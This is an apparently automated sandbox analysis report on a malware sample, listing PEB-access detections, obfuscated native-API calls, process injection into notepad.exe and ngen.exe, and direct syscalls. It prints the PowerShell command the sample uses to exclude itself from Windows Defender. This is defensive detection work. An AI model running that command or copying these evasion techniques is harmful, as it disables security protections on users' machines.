            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F172 mov eax, dword ptr fs:[00000030h]5_2_0572F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C9179 mov eax, dword ptr fs:[00000030h]5_2_057C9179
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05737152 mov eax, dword ptr fs:[00000030h]5_2_05737152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572C156 mov eax, dword ptr fs:[00000030h]5_2_0572C156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05736154 mov eax, dword ptr fs:[00000030h]5_2_05736154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05736154 mov eax, dword ptr fs:[00000030h]5_2_05736154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C4144 mov eax, dword ptr fs:[00000030h]5_2_057C4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C4144 mov eax, dword ptr fs:[00000030h]5_2_057C4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C4144 mov ecx, dword ptr fs:[00000030h]5_2_057C4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C4144 mov eax, dword ptr fs:[00000030h]5_2_057C4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C4144 mov eax, dword ptr fs:[00000030h]5_2_057C4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05729148 mov eax, dword ptr fs:[00000030h]5_2_05729148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05729148 mov eax, dword ptr fs:[00000030h]5_2_05729148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05729148 mov eax, dword ptr fs:[00000030h]5_2_05729148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05729148 mov eax, dword ptr fs:[00000030h]5_2_05729148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05731131 mov eax, dword ptr fs:[00000030h]5_2_05731131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05731131 mov eax, dword ptr fs:[00000030h]5_2_05731131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572B136 mov eax, dword ptr fs:[00000030h]5_2_0572B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572B136 mov eax, dword ptr fs:[00000030h]5_2_0572B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572B136 mov eax, dword ptr fs:[00000030h]5_2_0572B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572B136 mov eax, dword ptr fs:[00000030h]5_2_0572B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_058051CB mov eax, dword ptr fs:[00000030h]5_2_058051CB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05760124 mov eax, dword ptr fs:[00000030h]5_2_05760124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057DA118 mov ecx, dword ptr fs:[00000030h]5_2_057DA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057DA118 mov eax, dword ptr fs:[00000030h]5_2_057DA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057DA118 mov eax, dword ptr fs:[00000030h]5_2_057DA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057DA118 mov eax, dword ptr fs:[00000030h]5_2_057DA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_058061E5 mov eax, dword ptr fs:[00000030h]5_2_058061E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F0115 mov eax, dword ptr fs:[00000030h]5_2_057F0115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057601F8 mov eax, dword ptr fs:[00000030h]5_2_057601F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057551EF mov eax, dword ptr fs:[00000030h]5_2_057551EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057351ED mov eax, dword ptr fs:[00000030h]5_2_057351ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576D1D0 mov eax, dword ptr fs:[00000030h]5_2_0576D1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576D1D0 mov ecx, dword ptr fs:[00000030h]5_2_0576D1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AE1D0 mov eax, dword ptr fs:[00000030h]5_2_057AE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AE1D0 mov eax, dword ptr fs:[00000030h]5_2_057AE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AE1D0 mov ecx, dword ptr fs:[00000030h]5_2_057AE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AE1D0 mov eax, dword ptr fs:[00000030h]5_2_057AE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AE1D0 mov eax, dword ptr fs:[00000030h]5_2_057AE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F61C3 mov eax, dword ptr fs:[00000030h]5_2_057F61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F61C3 mov eax, dword ptr fs:[00000030h]5_2_057F61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574B1B0 mov eax, dword ptr fs:[00000030h]5_2_0574B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05805152 mov eax, dword ptr fs:[00000030h]5_2_05805152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057E11A4 mov eax, dword ptr fs:[00000030h]5_2_057E11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057E11A4 mov eax, dword ptr fs:[00000030h]5_2_057E11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057E11A4 mov eax, dword ptr fs:[00000030h]5_2_057E11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057E11A4 mov eax, dword ptr fs:[00000030h]5_2_057E11A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B019F mov eax, dword ptr fs:[00000030h]5_2_057B019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B019F mov eax, dword ptr fs:[00000030h]5_2_057B019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B019F mov eax, dword ptr fs:[00000030h]5_2_057B019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B019F mov eax, dword ptr fs:[00000030h]5_2_057B019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572A197 mov eax, dword ptr fs:[00000030h]5_2_0572A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572A197 mov eax, dword ptr fs:[00000030h]5_2_0572A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572A197 mov eax, dword ptr fs:[00000030h]5_2_0572A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05787190 mov eax, dword ptr fs:[00000030h]5_2_05787190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05770185 mov eax, dword ptr fs:[00000030h]5_2_05770185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057EC188 mov eax, dword ptr fs:[00000030h]5_2_057EC188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057EC188 mov eax, dword ptr fs:[00000030h]5_2_057EC188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05741070 mov eax, dword ptr fs:[00000030h]5_2_05741070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05741070 mov ecx, dword ptr fs:[00000030h]5_2_05741070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05741070 mov eax, dword ptr fs:[00000030h]5_2_05741070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05741070 mov eax, dword ptr fs:[00000030h]5_2_05741070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05741070 mov eax, dword ptr fs:[00000030h]5_2_05741070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05741070 mov eax, dword ptr fs:[00000030h]5_2_05741070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05741070 mov eax, dword ptr fs:[00000030h]5_2_05741070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05741070 mov eax, dword ptr fs:[00000030h]5_2_05741070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05741070 mov eax, dword ptr fs:[00000030h]5_2_05741070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05741070 mov eax, dword ptr fs:[00000030h]5_2_05741070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05741070 mov eax, dword ptr fs:[00000030h]5_2_05741070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05741070 mov eax, dword ptr fs:[00000030h]5_2_05741070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05741070 mov eax, dword ptr fs:[00000030h]5_2_05741070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575C073 mov eax, dword ptr fs:[00000030h]5_2_0575C073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AD070 mov ecx, dword ptr fs:[00000030h]5_2_057AD070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B106E mov eax, dword ptr fs:[00000030h]5_2_057B106E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05732050 mov eax, dword ptr fs:[00000030h]5_2_05732050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057D705E mov ebx, dword ptr fs:[00000030h]5_2_057D705E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057D705E mov eax, dword ptr fs:[00000030h]5_2_057D705E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575B052 mov eax, dword ptr fs:[00000030h]5_2_0575B052
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F903E mov eax, dword ptr fs:[00000030h]5_2_057F903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F903E mov eax, dword ptr fs:[00000030h]5_2_057F903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F903E mov eax, dword ptr fs:[00000030h]5_2_057F903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F903E mov eax, dword ptr fs:[00000030h]5_2_057F903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572A020 mov eax, dword ptr fs:[00000030h]5_2_0572A020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572C020 mov eax, dword ptr fs:[00000030h]5_2_0572C020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_058050D9 mov eax, dword ptr fs:[00000030h]5_2_058050D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574E016 mov eax, dword ptr fs:[00000030h]5_2_0574E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574E016 mov eax, dword ptr fs:[00000030h]5_2_0574E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574E016 mov eax, dword ptr fs:[00000030h]5_2_0574E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574E016 mov eax, dword ptr fs:[00000030h]5_2_0574E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572C0F0 mov eax, dword ptr fs:[00000030h]5_2_0572C0F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057720F0 mov ecx, dword ptr fs:[00000030h]5_2_057720F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057550E4 mov eax, dword ptr fs:[00000030h]5_2_057550E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057550E4 mov ecx, dword ptr fs:[00000030h]5_2_057550E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0572A0E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057380E9 mov eax, dword ptr fs:[00000030h]5_2_057380E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B20DE mov eax, dword ptr fs:[00000030h]5_2_057B20DE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057590DB mov eax, dword ptr fs:[00000030h]5_2_057590DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057470C0 mov eax, dword ptr fs:[00000030h]5_2_057470C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057470C0 mov ecx, dword ptr fs:[00000030h]5_2_057470C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057470C0 mov ecx, dword ptr fs:[00000030h]5_2_057470C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057470C0 mov eax, dword ptr fs:[00000030h]5_2_057470C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057470C0 mov ecx, dword ptr fs:[00000030h]5_2_057470C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057470C0 mov ecx, dword ptr fs:[00000030h]5_2_057470C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057470C0 mov eax, dword ptr fs:[00000030h]5_2_057470C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057470C0 mov eax, dword ptr fs:[00000030h]5_2_057470C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057470C0 mov eax, dword ptr fs:[00000030h]5_2_057470C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057470C0 mov eax, dword ptr fs:[00000030h]5_2_057470C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057470C0 mov eax, dword ptr fs:[00000030h]5_2_057470C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057470C0 mov eax, dword ptr fs:[00000030h]5_2_057470C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057470C0 mov eax, dword ptr fs:[00000030h]5_2_057470C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057470C0 mov eax, dword ptr fs:[00000030h]5_2_057470C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057470C0 mov eax, dword ptr fs:[00000030h]5_2_057470C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057470C0 mov eax, dword ptr fs:[00000030h]5_2_057470C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057470C0 mov eax, dword ptr fs:[00000030h]5_2_057470C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057470C0 mov eax, dword ptr fs:[00000030h]5_2_057470C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AD0C0 mov eax, dword ptr fs:[00000030h]5_2_057AD0C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AD0C0 mov eax, dword ptr fs:[00000030h]5_2_057AD0C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F60B8 mov eax, dword ptr fs:[00000030h]5_2_057F60B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F60B8 mov ecx, dword ptr fs:[00000030h]5_2_057F60B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05805060 mov eax, dword ptr fs:[00000030h]5_2_05805060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05735096 mov eax, dword ptr fs:[00000030h]5_2_05735096
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575D090 mov eax, dword ptr fs:[00000030h]5_2_0575D090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575D090 mov eax, dword ptr fs:[00000030h]5_2_0575D090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576909C mov eax, dword ptr fs:[00000030h]5_2_0576909C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573208A mov eax, dword ptr fs:[00000030h]5_2_0573208A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572D08D mov eax, dword ptr fs:[00000030h]5_2_0572D08D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057D437C mov eax, dword ptr fs:[00000030h]5_2_057D437C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05737370 mov eax, dword ptr fs:[00000030h]5_2_05737370
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05737370 mov eax, dword ptr fs:[00000030h]5_2_05737370
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05737370 mov eax, dword ptr fs:[00000030h]5_2_05737370
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057EF367 mov eax, dword ptr fs:[00000030h]5_2_057EF367
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0580539D mov eax, dword ptr fs:[00000030h]5_2_0580539D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05729353 mov eax, dword ptr fs:[00000030h]5_2_05729353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05729353 mov eax, dword ptr fs:[00000030h]5_2_05729353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B035C mov eax, dword ptr fs:[00000030h]5_2_057B035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B035C mov eax, dword ptr fs:[00000030h]5_2_057B035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B035C mov eax, dword ptr fs:[00000030h]5_2_057B035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B035C mov ecx, dword ptr fs:[00000030h]5_2_057B035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B035C mov eax, dword ptr fs:[00000030h]5_2_057B035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B035C mov eax, dword ptr fs:[00000030h]5_2_057B035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057FA352 mov eax, dword ptr fs:[00000030h]5_2_057FA352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B2349 mov eax, dword ptr fs:[00000030h]5_2_057B2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B2349 mov eax, dword ptr fs:[00000030h]5_2_057B2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B2349 mov eax, dword ptr fs:[00000030h]5_2_057B2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B2349 mov eax, dword ptr fs:[00000030h]5_2_057B2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B2349 mov eax, dword ptr fs:[00000030h]5_2_057B2349
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            .NET source code references suspicious native API functions
            Source: NdYuOgHbM9.exe, --------.csReference to suspicious API methods: ((_FDEE_FBD2)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary(_0619(_0670_FDFE_0603_06FE._FBB4)), _0619(_0670_FDFE_0603_06FE._FBCA_064D)), typeof(_FDEE_FBD2)))("626949", out var _)
            Source: NdYuOgHbM9.exe, --------.csReference to suspicious API methods: ((_FDEE_FBD2)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary(_0619(_0670_FDFE_0603_06FE._FBB4)), _0619(_0670_FDFE_0603_06FE._FBCA_064D)), typeof(_FDEE_FBD2)))("626949", out var _)
            Source: NdYuOgHbM9.exe, --------.csReference to suspicious API methods: VirtualProtect(procAddress, (uint)array.Length, 64u, out var _061A_FDE2_FBC8)
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -ForceJump to behavior
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeMemory allocated: C:\Windows\System32\notepad.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000 protect: page execute and read and writeJump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
